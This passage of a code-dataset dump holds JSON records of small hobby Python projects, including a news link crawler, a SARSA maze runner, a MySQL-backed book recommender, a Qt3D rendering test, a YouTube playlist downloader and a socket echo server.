monomers, identity_th)\n \ndef convert_fasta(filename, reads, monomers, outfile, identity_th):\n with open(outfile[:-len(\".tsv\")] + \"_alt.tsv\", \"w\") as fout_alt:\n with open(outfile, \"w\") as fout:\n with open(filename, \"r\") as fin:\n cur_dec = []\n prev_read = None\n for ln in fin.readlines():\n if ln.startswith(\">\"):\n read = ln.split(\"/\")[0][1:]\n if read != prev_read and prev_read != None:\n print_read(fout, fout_alt, cur_dec, reads[prev_read], monomers, identity_th)\n cur_dec = []\n prev_read = read\n start, end = [int(x) for x in ln.split(\"/\")[1].split(\"_\")]\n cur_dec.append({\"m\": None, \"start\": start, \"end\": end})\n if len(cur_dec) > 0:\n print_read(fout, fout_alt, cur_dec, reads[prev_read], monomers, identity_th)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Convert decomposition scores into identities')\n parser.add_argument('-s', '--sequences', help='fasta-file with long reads sequences', required=True)\n parser.add_argument('-m', '--monomers', help='fasta-file with monomers', required=True)\n parser.add_argument('-d', '--decomposition', help='tsv-file (for DP) or fasta-file (for AC) with decomposition', required=True)\n parser.add_argument('-i', '--min-identity', help='only monomer alignments with percent identity >= MIN_IDENTITY are printed (by default MIN_IDENTITY=0)', type=int, default=0, required=False)\n parser.add_argument('-o', '--out', help='output tsv-file, by default will be saved into decomposition.tsv', required=False)\n\n args = parser.parse_args()\n outfile = args.out\n if outfile == None:\n outfile = \"./decomposition.tsv\"\n\n reads = load_fasta(args.sequences, \"map\")\n monomers = load_fasta(args.monomers)\n monomers = add_rc_monomers(monomers)\n if args.decomposition.endswith(\"tsv\"):\n convert_tsv(args.decomposition, reads, monomers, outfile, args.min_identity)\n else:\n convert_fasta(args.decomposition, reads, monomers, outfile, args.min_identity)\n\n \n \n\n","repo_name":"TanyaDvorkina/sdpaper","sub_path":"scripts/convert_identities.py","file_name":"convert_identities.py","file_ext":"py","file_size_in_byte":6587,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"25968826316","text":"my_string = input(\"Введите числа через пробел: \")\nlist_num = my_string.split()\nnumbers = []\nfor i in range(len(list_num)):\n numbers.append(int(list_num[i]))\n\n\ndef get_sum(my_list):\n my_sum = 0\n for j in range(1, len(my_list), 2):\n my_sum += my_list[j]\n return my_sum\n\n\nprint(f'Сумма элементов, стоящих на нечётной позиции: {get_sum(numbers)}')\n","repo_name":"nararock/homework_python3","sub_path":"task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15248896550","text":"import recom as WebCrawl\n\n\ndef is_title(title1):\n # 字符串是否为新闻标题(初判断:不含一个汉字)\n\n def is_chinese(char0):\n # 判断单个字符是否为汉字\n if '\\u4e00' <= char0 <= '\\u9fff':\n return True\n else:\n return False\n\n n = len(title1)\n count = 0\n for char in title1:\n if not is_chinese(char):\n count = count + 1\n if count == n:\n return False\n else:\n return True\n\n\ndef link_judge(url, link):\n # 链接是否为视频或图片链接等\n\n if url == WebCrawl.urls[0]:\n if link.startswith('http://www.xinhuanet.com/video/')\\\n or link.startswith('http://news.xinhuanet.com/video/')\\\n or link == 'http://fms.news.cn/swf/2017qmtt/7_3_2017_jj/index.html':\n return False\n\n if url == WebCrawl.urls[1]:\n if link.startswith('http://www.chinanews.com/gj/shipin/') \\\n or link.startswith('http://www.chinanews.com/tp/')\\\n or link.startswith('http://www.chinanews.com/shipin/'):\n return False\n\n '''if url == WebCrawl.urls[2]:\n if link.startswith('http://slide.blog.sina.com.cn/') \\\n or link.startswith('http://blog.sina.com.cn/')\\\n or link.startswith('http://vip.book.sina.com.cn/'):\n return False\n\n if url == WebCrawl.urls[3]:\n if link.startswith('http://slide.blog.sina.com.cn/') \\\n or link.startswith('http://blog.sina.com.cn/')\\\n or link.startswith('http://vip.book.sina.com.cn/')\\\n or link.startswith('http://zx.jiaju.sina.com.cn/')\\\n or link.startswith('http://video.sina.com.cn/'):\n return False\n\n if url == WebCrawl.urls[3]:\n if link.startswith('http://huanqiu.com/a1/')\\\n or link.startswith('http://bbs.huanqiu.com/'):\n return False\n\n if url == WebCrawl.urls[4]:\n if link.startswith('http://view.inews.qq.com/'):\n return False'''\n\n return True\n\n\ndef analyze(url, soup1):\n # 提取链接中的正文内容\n\n init = 1 # 初始标题长度下限\n if url == WebCrawl.urls[0]: # 新华网\n news0 = soup1.select(\"div.chaCom_con a\")\n news1 = soup1.select(\"ul.dataList01 a\")\n news2 = soup1.select(\"h3.focusWordBlue a\")\n news = news0 + news1 + news2\n\n elif url == WebCrawl.urls[1]: # 中国新闻网\n news0 = soup1.select('div.xwzxdd-xbt a')\n news1 = soup1.select('div.new_right_content a')\n news2 = soup1.select(\"div.new_con_yw a\")\n news3 = soup1.select(\"div.rank_right_ul a\")\n news4 = soup1.select(\"div.mt15 a\")\n news = news0 + news1 + news2 + news3 + news4\n init = 4\n\n '''elif url == WebCrawl.urls[2]: # 新浪新闻\n news0 = soup1.select(\"div.blk_04 a\" and \"div#blk_yw_01 a\")\n news1 = soup1.select(\"div.p_left_2 a\")\n news2 = soup1.select(\"div.p_middle a\")\n news = news0 + news1 + news2\n init = 2\n\n elif url == WebCrawl.urls[3]: # 环球网\n news0 = soup1.select(\"div.look a\")\n news1 = soup1.select(\"div.lookOverseas a\")\n news2 = soup1.select(\"div.midFir a\")\n news3 = soup1.select(\"div.txtArea a\")\n news4 = soup1.select(\"ul.iconBoxT14 a\")\n news = news0 + news1 + news2 + news3 + news4\n init = 4\n\n elif url == WebCrawl.urls[4]: # 腾讯新闻\n news0 = soup1.select(\"div.society a\")\n news1 = soup1.select(\"div.military a\")\n news2 = soup1.select(\"div.history a\")\n news3 = soup1.select(\"div.media a\")\n news4 = soup1.select(\"div.gongyi a\")\n news5 = soup1.select(\"div.city a\")\n news6 = soup1.select(\"div#subHot a\")\n news7 = soup1.select(\"em.f14 > a\")\n news8 = soup1.select(\"div.text > ul > li > a\")\n news = news0 + news1 + news2 + news3 + news4 + news5 + news6 + news7 + news8\n init = 2'''\n\n print('根据网页排布初次筛选后的链接数:', len(news))\n\n newslist = []\n linklist = []\n\n for n in news:\n\n link = n.get(\"href\")\n if url == WebCrawl.urls[1]:\n # 中国新闻网标签中给出的是站内地址\n if link.startswith('//'):\n link = link.replace('//', 'http://')\n else:\n if link.startswith('/'):\n link = 'http://www.chinanews.com/' + link\n\n if link not in linklist and len(link) > 30: # 链接判重,长度过滤\n title = n.get_text()\n if not link_judge(url, link): # 自定义函数舍弃无效链接\n title = ''\n if len(title) > init and is_title(title): # 标题长度、内容过滤\n linklist.append(link)\n alist = [title, link]\n newslist.append(alist)\n\n print('链接判重及过滤后根据标题再次筛选所得的链接数:', len(newslist))\n print(newslist)\n\n return newslist\n","repo_name":"LinkleYping/news-recommend","sub_path":"recom/recom/website.py","file_name":"website.py","file_ext":"py","file_size_in_byte":4998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"74806984264","text":"#! python \n# @Time : 17-12-19\n# @Author : kay\n# @File : run.py\n# @E-mail : 861186267@qq.com\n# @Function:\n\nfrom environment import MAZE\nfrom SarsaAndQ_Learning import *\n\n\ndef update():\n for epoch in range(200):\n observation = env.reset()\n action = RL.choose_action(str(observation))\n\n while True:\n # refresh env\n env.render()\n\n # take action and get next observation and reward\n observation_, reward, done = env.step(action)\n\n action_ = RL.choose_action(str(observation_))\n RL.learn(str(observation), action, reward, str(observation_), action_)\n\n action = action_\n observation = observation_\n\n if done:\n break\n\n\nif __name__ == '__main__':\n env = MAZE()\n RL = Sarsa(actions=list(range(env.n_actions)))\n env.after(100, update)\n env.mainloop()\n","repo_name":"kayzss/ReinforceLearning","sub_path":"Maze/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7539829990","text":"import numpy as np\nimport mysql.connector\nimport logging\n\n#它娘的。\n#bookid到底是以str还是int来保存的?从数据库取出来之后,都是str,但是在放入row。\n#配置文件的保存\n#np.zeros是否能用空间更小的方式保存。\n#将row、line转化为np文件\n#下面还没用上\ndatabase = ''\nintable = 'booklist_yousuu'\nouttable = 'toprelate_yousuu'\nminrefered= 9\ndb_user = 'root'\ndb_password = 'password'\ndb_database = 'Recommend'\n\nclass Recommend():\n def __init__(self,mini_refered,topN=5):\n self.users = []\n self.items = []\n self.mini_refered = mini_refered\n self.topN = topN\n\n def mysql_connector(self, sql):\n # 'select * from %s' %table\n cursor = conn.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n logger.info('execute sql: %s' % sql)\n cursor.close()\n return result\n\n def load_from_db(self):\n #数据库\n self.data = self.mysql_connector('select * from %s' %intable)\n #计算user\\items,计算次数\n items_with_count = {}\n for x in self.data:\n user = x[0]\n item = x[1]\n if user not in self.users:\n self.users.append(user)\n if item not in self.items:\n self.items.append(item)\n items_with_count[item] = 0\n else:\n items_with_count[item] += 1\n #去掉item中那些未达标的\n for i in items_with_count:\n if items_with_count[i] < self.mini_refered:\n self.items.remove(i)\n\n\n def item_user_matrix(self):\n self.iumatrix = np.zeros((len(self.items), len(self.users)))\n for x in self.data:\n user = x[0]\n item = x[1]\n if item in self.items:\n r = self.items.index(item) # 定位行,book,要变成数字\n l = self.users.index(user) # !!!如果有的话 定位列,书单\n self.iumatrix[r][l] = x[2]\n logger.info('iumatrix finish。')\n\n def cos(self,vector1, vector2):\n #这里打分未经过修正\n dot_product = 0.0\n normA = 0.0\n normB = 0.0\n for a, b in zip(vector1, vector2):\n dot_product += a * b\n normA += a ** 2\n normB += b ** 2\n if normA == 0.0 or normB == 0.0 or dot_product == 0.0:\n return 0\n else:\n return round(dot_product / ((normA ** 0.5) * (normB ** 0.5)) * 100, 2) # round()返回浮点数x的四舍五入值\n\n def item_item_matrix(self):\n item_num= len(self.items)\n self.iimatrix =np.zeros((item_num,item_num))\n logger.info('iimatrix start:')\n #self.bbmatrix = self.bpmatrix + self.load_temp()\n for i in range(item_num - 1):\n for j in range(i+1,item_num):\n self.iimatrix[i][j] = self.iimatrix[j][i] = self.cos(self.iumatrix[i], self.iumatrix[j]) # 行相乘\n logger.info('line Done : %s' %i)\n print ('line Done : %s' %i)\n logger.info('iimatrix赋值完。')\n\n def find_top_related_item(self):\n #每本书,比较,获得其中最大的item。\n all_topitems = []\n for i in range(len(self.items)): #对每一个item进行循环\n topitems = [self.items[i]] #数据库里第一行是自己,然后是top1,2,3,4,5\n items_with_score = zip(self.iimatrix[i], self.items)\n top_item_with_socre = sorted(items_with_score, reverse=True)[:self.topN] # [(99,11),(90,2),...]\n for topitem in top_item_with_socre:\n topitems.append(topitem[1])\n all_topitems.append(topitems)\n logger.info(topitems)\n self.save(all_topitems)\n logger.info('top赋值完。')\n #进一步保存\n\n def save(self,items):\n #t0,[t1, t2, t3, t4, t5] = items\n #这里不知道怎么输入这个table名\n #cursor.execute('insert into toprelate_saowen(bookid,top1,top2,top3,top4,top5) values(%s,%s,%s,%s,%s,%s)',\n # [t0, t1, t2, t3, t4, t5])\n sql = 'INSERT INTO '+ outtable + ' VALUES(%s,%s,%s,%s,%s,%s)'\n cursor = conn.cursor()\n cursor.executemany(sql,items)\n conn.commit()\n cursor.close()\n print ('全部保存')\n\n def main(self):\n self.load_from_db()\n self.item_user_matrix()\n self.item_item_matrix()\n self.find_top_related_item()\n\n\n\nlogging.basicConfig(filename='producer.log', level=logging.INFO, filemode='a', format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s', datefmt='%Y/%m/%d %H:%M:%S')\nlogger = logging.getLogger(__name__)\nconn = mysql.connector.connect(user=db_user, password=db_password, database=db_database)\n\n\nr = Recommend(mini_refered=minrefered)\nr.main()\n\nconn.close()\n\n\n","repo_name":"MinionBug/recommend","sub_path":"producer/main_v2.py","file_name":"main_v2.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23755392182","text":"#!/usr/bin/env python3\n\nimport sys\n\nimport numpy as np\n\n# from spwc import sscweb\n\nfrom PySide2.Qt3DExtras import Qt3DExtras\nfrom PySide2.Qt3DCore import Qt3DCore\nfrom PySide2.Qt3DRender import Qt3DRender\n\nfrom PySide2.QtWidgets import (\n QApplication,\n)\n\nfrom PySide2.QtGui import (\n QVector3D,\n QQuaternion,\n QMatrix4x4,\n QColor,\n)\n\nfrom PySide2.QtCore import (\n QObject,\n Property,\n Signal,\n\n QPropertyAnimation,\n QByteArray,\n\n qFuzzyCompare,\n QSize\n)\n\nclass PointGeometry(Qt3DRender.QGeometry):\n def __init__(self, position: QVector3D, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.vertexBuffer = Qt3DRender.QBuffer()\n self.indexBuffer = Qt3DRender.QBuffer()\n self.positionAttribute = Qt3DRender.QAttribute()\n self.indexAttribute = Qt3DRender.QAttribute()\n\n self.positionAttribute.setName(Qt3DRender.QAttribute.defaultPositionAttributeName())\n self.positionAttribute.setVertexBaseType(Qt3DRender.QAttribute.Float)\n self.positionAttribute.setVertexSize(3)\n self.positionAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.positionAttribute.setBuffer(self.vertexBuffer)\n self.positionAttribute.setByteStride(0)\n self.positionAttribute.setCount(3)\n\n self.indexAttribute.setAttributeType(Qt3DRender.QAttribute.IndexAttribute)\n self.indexAttribute.setVertexBaseType(Qt3DRender.QAttribute.UnsignedShort)\n self.indexAttribute.setBuffer(self.indexBuffer)\n self.indexAttribute.setCount(1)\n\n self.data = PointGeometry.createPointVertexData(position)\n self.vertexBuffer.setData(self.data)\n\n self.index = PointGeometry.createPointIndexData()\n self.vertexBuffer.setData(self.index)\n\n self.addAttribute(self.positionAttribute)\n self.addAttribute(self.indexAttribute)\n\n def createPointVertexData(position: QVector3D):\n data = np.array((position.x(), position.y(), position.z()), dtype=np.single)\n assert len(data.tobytes()) == 12\n print([hex(c) for c in data.tobytes()])\n return data.tobytes()\n\n def createPointIndexData():\n data = np.array([0], dtype=np.uint16)\n assert len(data.tobytes()) == 2\n print(data)\n return data.tobytes()\n\n\nclass Point(Qt3DRender.QGeometryRenderer):\n def __init__(self, position: QVector3D, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self._geometry = PointGeometry(position)\n self.setPrimitiveType(Qt3DRender.QGeometryRenderer.Points)\n\n self.setGeometry(self._geometry)\n\n\nclass Plane(Qt3DCore.QEntity):\n\n\n\n def __init__(self, w: float, h: float, resolution: QSize, color: QColor, mirrored: bool = False,\n *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\n self._geo = Qt3DRender.QGeometry(self)\n\n self.positionAttribute = Qt3DRender.QAttribute(self._geo)\n self.normalAttribute = Qt3DRender.QAttribute(self._geo)\n self.texCoordAttribute = Qt3DRender.QAttribute(self._geo)\n self.tangentAttribute = Qt3DRender.QAttribute(self._geo)\n self.indexAttribute = Qt3DRender.QAttribute(self._geo)\n self.vertexBuffer = Qt3DRender.QBuffer(self._geo)\n self.indexBuffer = Qt3DRender.QBuffer(self._geo)\n\n nVerts = resolution.width() * resolution.height()\n stride = (3 + 2 + 3 + 4) * 4 # sizeof(float);\n faces = 2 * (resolution.width() - 1) * (resolution.height() - 1)\n\n self.positionAttribute.setName(Qt3DRender.QAttribute.defaultPositionAttributeName())\n self.positionAttribute.setVertexBaseType(Qt3DRender.QAttribute.Float)\n self.positionAttribute.setVertexSize(3)\n self.positionAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.positionAttribute.setBuffer(self.vertexBuffer)\n self.positionAttribute.setByteStride(stride)\n self.positionAttribute.setCount(nVerts)\n\n self.texCoordAttribute.setName(Qt3DRender.QAttribute.defaultTextureCoordinateAttributeName())\n self.positionAttribute.setVertexBaseType(Qt3DRender.QAttribute.Float)\n self.texCoordAttribute.setVertexSize(2)\n self.texCoordAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.texCoordAttribute.setBuffer(self.vertexBuffer)\n self.texCoordAttribute.setByteStride(stride)\n self.texCoordAttribute.setByteOffset(3 * 4)\n self.texCoordAttribute.setCount(nVerts)\n\n self.normalAttribute.setName(Qt3DRender.QAttribute.defaultNormalAttributeName())\n self.normalAttribute.setVertexBaseType(Qt3DRender.QAttribute.Float)\n self.normalAttribute.setVertexSize(3)\n self.normalAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.normalAttribute.setBuffer(self.vertexBuffer)\n self.normalAttribute.setByteStride(stride)\n self.normalAttribute.setByteOffset(5 * 4)\n self.normalAttribute.setCount(nVerts)\n\n self.tangentAttribute.setName(Qt3DRender.QAttribute.defaultTangentAttributeName())\n self.tangentAttribute.setVertexBaseType(Qt3DRender.QAttribute.Float)\n self.tangentAttribute.setVertexSize(4)\n self.tangentAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.tangentAttribute.setBuffer(self.vertexBuffer)\n self.tangentAttribute.setByteStride(stride)\n self.tangentAttribute.setByteOffset(8 * 4)\n self.tangentAttribute.setCount(nVerts)\n\n self.indexAttribute.setAttributeType(Qt3DRender.QAttribute.IndexAttribute)\n self.indexAttribute.setVertexBaseType(Qt3DRender.QAttribute.UnsignedShort)\n self.indexAttribute.setBuffer(self.indexBuffer)\n\n # Each primitive has 3 vertives\n self.indexAttribute.setCount(faces * 3)\n\n self.vertexBuffer.setData(Plane.createPlaneVertexData(w, h, resolution, mirrored))\n self.indexBuffer.setData(Plane.createPlaneIndexData(resolution))\n\n self._geo.addAttribute(self.positionAttribute)\n self._geo.addAttribute(self.texCoordAttribute)\n self._geo.addAttribute(self.normalAttribute)\n self._geo.addAttribute(self.tangentAttribute)\n self._geo.addAttribute(self.indexAttribute)\n\n # mesh\n self.mesh = Qt3DRender.QGeometryRenderer(self)\n self.mesh.setGeometry(self._geo)\n self.mesh.setPrimitiveType(Qt3DRender.QGeometryRenderer.TriangleFan)\n\n self.material = Qt3DExtras.QPhongMaterial(self)\n self.material.setAmbient(color)\n\n self.addComponent(self.mesh)\n self.addComponent(self.material)\n\n\nclass Line(Qt3DCore.QEntity):\n def __init__(self,\n points: np.array,\n color: QColor,\n *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n print(points, points.shape, points.dtype, len(points.tobytes()))\n\n self._geo = Qt3DRender.QGeometry(self)\n\n # position vertices (start and end)\n self.buffer = Qt3DRender.QBuffer(self._geo)\n self.buffer.setData(points.tobytes())\n\n print(self.buffer.data().size())\n\n self.positionAttribute = Qt3DRender.QAttribute(self._geo)\n self.positionAttribute.setName(Qt3DRender.QAttribute.defaultPositionAttributeName())\n self.positionAttribute.setVertexBaseType(Qt3DRender.QAttribute.Double)\n self.positionAttribute.setVertexSize(3)\n self.positionAttribute.setAttributeType(Qt3DRender.QAttribute.VertexAttribute)\n self.positionAttribute.setBuffer(self.buffer)\n self.positionAttribute.setByteStride(points.shape[1] * 8) # sizeof(float)\n self.positionAttribute.setCount(points.shape[0])\n self._geo.addAttribute(self.positionAttribute) # We add the vertices in the geometry\n\n # connectivity between vertices\n self.indices = np.arange(0, points.shape[0], dtype=np.uint32).tobytes()\n\n self.indexBuffer = Qt3DRender.QBuffer(self._geo)\n self.indexBuffer.setData(self.indices)\n\n self.indexAttribute = Qt3DRender.QAttribute(self._geo)\n self.indexAttribute.setVertexBaseType(Qt3DRender.QAttribute.UnsignedInt)\n self.indexAttribute.setAttributeType(Qt3DRender.QAttribute.IndexAttribute)\n self.indexAttribute.setBuffer(self.indexBuffer)\n self.indexAttribute.setCount(points.shape[0])\n self._geo.addAttribute(self.indexAttribute) # We add the indices linking the points in the geometry\n\n # mesh\n self.line = Qt3DRender.QGeometryRenderer(self)\n self.line.setGeometry(self._geo)\n self.line.setPrimitiveType(Qt3DRender.QGeometryRenderer.TriangleStrip)\n\n self.material = Qt3DExtras.QPhongMaterial(self)\n self.material.setAmbient(color)\n\n self.addComponent(self.line)\n self.addComponent(self.material)\n\n\nclass OrbitTransformController(QObject):\n def __init__(self, turn_vector: QVector3D, pos: QVector3D, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self._radius = 1.0\n self._angle = 0\n self._target = None\n self._matrix = QMatrix4x4()\n self._turn = turn_vector\n self._pos = pos\n\n def setTarget(self, target: Qt3DCore.QTransform):\n if self._target != target:\n self._target = target\n self.targetChanged.emit()\n\n def target(self):\n return self._target\n\n def setRadius(self, radius: float):\n if not qFuzzyCompare(radius, self._radius):\n self._radius = radius\n self._updateMatrix()\n self.radiusChanged.emit()\n\n def radius(self):\n return self._radius\n\n def setAngle(self, angle: float):\n if not qFuzzyCompare(angle, self._angle):\n self._angle = angle\n self._updateMatrix()\n self.angleChanged.emit()\n\n def angle(self):\n return self._angle\n\n def _updateMatrix(self):\n self._matrix.setToIdentity()\n self._matrix.rotate(self._angle, self._turn)\n self._matrix.translate(self._radius + self._pos.x(), self._pos.y(), self._pos.z())\n self._target.setMatrix(self._matrix)\n\n target = Property(Qt3DCore.QTransform, target, setTarget)\n radius = Property(float, radius, setRadius)\n angle = Property(float, angle, setAngle)\n\n targetChanged = Signal()\n radiusChanged = Signal()\n angleChanged = Signal()\n\n\n\n\nclass Sphere(Qt3DCore.QEntity):\n def __init__(self, root, pos, rad, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.sphereEntity = Qt3DCore.QEntity(root)\n self.sphereMesh = Qt3DExtras.QSphereMesh()\n self.sphereMesh.setRadius(rad)\n self.sphereMesh.setGenerateTangents(True)\n\n self.sphereTransform = Qt3DCore.QTransform()\n self.sphereTransform.setTranslation(pos)\n\n self.sphereEntity.addComponent(self.sphereMesh)\n self.sphereEntity.addComponent(self.sphereTransform)\n\n self.material = Qt3DExtras.QPhongMaterial(root)\n self.sphereEntity.addComponent(self.material)\n\n\nclass Scene(Qt3DCore.QEntity):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # self.material = Qt3DExtras.QPhongMaterial(self)\n\n # self.torusEntity = Qt3DCore.QEntity(self)\n # self.torusMesh = Qt3DExtras.QTorusMesh()\n # self.torusMesh.setRadius(5)\n # self.torusMesh.setMinorRadius(1)\n # self.torusMesh.setRings(100)\n # self.torusMesh.setSlices(20)\n\n # self.torusTransform = Qt3DCore.QTransform()\n # self.torusTransform.setScale3D(QVector3D(1.5, 1, 0.5))\n # self.torusTransform.setTranslation(QVector3D(0, 0, 0)) # position\n # self.torusTransform.setRotation(QQuaternion.fromAxisAndAngle(QVector3D(1, 0, 0), 45.0))\n\n # self.torusEntity.addComponent(self.torusMesh)\n # self.torusEntity.addComponent(self.torusTransform)\n # self.torusEntity.addComponent(self.material)\n\n # self.cuboid = Qt3DExtras.QCuboidMesh()\n # # CuboidMesh Transform\n # self.cuboidTransform = Qt3DCore.QTransform()\n # self.cuboidTransform.setScale(10.0)\n # self.cuboidTransform.setTranslation(QVector3D(5.0, -4.0, 0.0))\n\n # self.cuboidMaterial = Qt3DExtras.QPhongAlphaMaterial()\n # self.cuboidMaterial.setDiffuse(QColor.fromRgb(120, 20, 20))\n # self.cuboidMaterial.setAlpha(0.5)\n\n # self.cuboidEntity = Qt3DCore.QEntity(self)\n # self.cuboidEntity.addComponent(self.cuboid)\n # self.cuboidEntity.addComponent(self.cuboidMaterial)\n # self.cuboidEntity.addComponent(self.cuboidTransform)\n\n # self.sphere = []\n # count = 100\n # for i in range(count):\n # self.sphere.append(SphereEntity(self, QVector3D(i, i, i), QVector3D(0, 100 * i / count, 0)))\n\n points = np.array([[0, -10, 0],\n [0, 10, 0],\n [10, 10, 10],\n [10, 10, 20]\n ], dtype=np.float)\n\n # ssc = sscweb.SscWeb()\n # sv = ssc.get_orbit(product=\"mms1\",\n # start_time=\"2020-10-10\",\n # stop_time=\"2020-10-24\",\n # coordinate_system='gse')\n\n # points = sv.data[::50, 0:3] / 10000\n\n # self.line = Line(points, QColor.fromRgb(0, 255, 0), self)\n\n # self.spheres = []\n # for p in points:\n # print(p, p[0])\n # self.spheres.append(Sphere(self, QVector3D(p[0], p[1], p[2]), 0.1))\n\n # self.plane = Plane(10, 10, QSize(2, 3), False, QColor.fromRgb(0, 255, 0), self)\n\n self.plane = Qt3DCore.QEntity(self)\n\n self.planeMesh = Qt3DExtras.QPlaneMesh()\n Qt3DRender.QGeometryRenderer(self.planeMesh).setPrimitiveType(Qt3DRender.QGeometryRenderer.Lines)\n self.planeTransform = Qt3DCore.QTransform()\n self.planeMaterial = Qt3DExtras.QPhongMaterial(self)\n\n self.planeMesh.setWidth(10)\n self.planeMesh.setHeight(10)\n\n self.planeMesh.setMeshResolution(QSize(10, 10))\n\n self.planeTransform.setTranslation(QVector3D(0, 0, 0))\n # self.planeMaterial.setDiffuse(QColor(150, 150, 150))\n # self.planeMaterial.setAmbient(QColor(150, 150, 150))\n\n self.plane.addComponent(self.planeMaterial)\n self.plane.addComponent(self.planeMesh)\n self.plane.addComponent(self.planeTransform)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n\n view = Qt3DExtras.Qt3DWindow()\n view.setTitle(\"3D PySide2\")\n view.defaultFrameGraph().setClearColor(QColor(210, 210, 220))\n\n # scene = Scene()\n root = Qt3DCore.QEntity()\n\n e = []\n\n for i in range(-5, 6):\n for j in range(-5, 6):\n point = Point(QVector3D(i, j, 0))\n\n e += [point]\n\n point_transform = Qt3DCore.QTransform()\n point_transform.setTranslation(QVector3D(0, 0, 0)) # position\n\n e += [point_transform]\n\n # // this is my hacky way of setting point size\n # // the better way to do this is probably to create\n # // your own shader and then use QPointSize::SizeMode::Programmable\n # // that's for another journal...\n point_material = Qt3DExtras.QPhongMaterial()\n point_material.setAmbient(QColor(255, 0, 0))\n\n effect = point_material.effect()\n for t in effect.techniques():\n for rp in t.renderPasses():\n pointSize = Qt3DRender.QPointSize()\n pointSize.setSizeMode(Qt3DRender.QPointSize.SizeMode.Fixed)\n pointSize.setValue(4.0)\n rp.addRenderState(pointSize)\n e += [pointSize]\n\n e += [point_material]\n\n entity = Qt3DCore.QEntity(root)\n entity.addComponent(point)\n entity.addComponent(point_transform)\n entity.addComponent(point_material)\n\n e += [entity]\n\n # self.e += [Sphere(self, QVector3D(i, j, 0), 0.1)]\n # self.e.append(selfSphere(self, QVector3D(i, j, 0), 0.1))\n\n # Camera\n camera = view.camera()\n camera.lens().setPerspectiveProjection(65.0, 16.0 / 9.0, 0.1, 100.0)\n camera.setPosition(QVector3D(-5, 10, -20.0))\n camera.setViewCenter(QVector3D(0, 0, 0))\n\n\n\n# # For camera controls\n# camController = Qt3DExtras.QOrbitCameraController(scene)\n# camController.setLinearSpeed(50.0)\n# camController.setLookSpeed(180.0)\n# camController.setCamera(camera)\n\n view.setRootEntity(root)\n view.show()\n\n sys.exit(app.exec_())\n","repo_name":"pboettch/OrbitViewer","sub_path":"example/simple3d.py","file_name":"simple3d.py","file_ext":"py","file_size_in_byte":16601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7283930468","text":"import pytube\n\n''' Inspired by NeuralNine '''\n'''WARNING: DOWNLOADING COPYRIGHTED MATERIAL IS HIGHLY ILLEGAL!\nI DO NOT TAKE ANY RESPONSIBILITY FROM THE USAGE OF THIS TOOL!\nTHIS IS FOR EDUCATIONAL PURPOSES ONLY!'''\n\nurl = input(\"Paste Playlist URL\")\n\nplaylist = pytube.Playlist(url)\nfor url in playlist:\n\tvideo = pytube.Youtube(url)\n\tstream = video.streams.get_by_itag(22)\n\tprint(\"Downloading playlist...\")\n\tstream.download\n\tprint(\"Done!\")\n","repo_name":"luisppinto/youtube-downloader","sub_path":"playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43210209326","text":"import socket\nimport logging\n\nlogging.basicConfig(\n filename='server.log',\n filemode='a',\n format='%(asctime)s - %(levelname)s - %(message)s',\n datefmt='%d-%b-%y %H:%M:%S',\n level=logging.DEBUG\n)\n\nlogging.debug('\\n')\nlogging.debug('Запуск сервера')\n\nsock = socket.socket() # инициализация сокета\nsock.settimeout(60)\n\n# Задаётся базовый порт\n\nport = int(input(\"Введите порт: \"))\n\nwhile True:\n try:\n sock.bind(('', port))\n except socket.error:\n logging.warning('Порт %s занят, поиск другого', port)\n port += 1\n else:\n logging.debug('Назначен порт %s', port)\n break\n\nlogging.debug('Прослушивание порта')\nsock.listen(1)\n\nwhile True:\n\n logging.debug('Ожидание подключения клиента')\n try:\n #Записываем адресс клиента\n conn, addr = sock.accept()\n except socket.timeout:\n try:\n logging.warning('Сервер бездействует, остановка ..')\n sock.shutdown(socket.SHUT_RDWR)\n except (socket.error, OSError, ValueError):\n pass\n break\n\n logging.debug('Клиент подключен, информация о нём: %s', addr)\n\n logging.debug('Обмен сообщениями с клиентом')\n while True:\n data = conn.recv(1024)\n if not data or (data.decode()).lower() == \"exit\":\n logging.debug('Клиент завершил обмен')\n break\n logging.debug('Сообщение от %s: %s', addr, data.decode())\n conn.send(data)\n\n conn.close()\n logging.debug('Клиент отключен')\n\nsock.close()\nlogging.debug('Сервер остановлен')\n","repo_name":"Rovenich/1_echo_server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"ru","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"34963193707","text":"import talib as ta\nimport numpy as np\nimport pandas as pd\n\nclass TradingStrategy:\n \n def __init__(self, 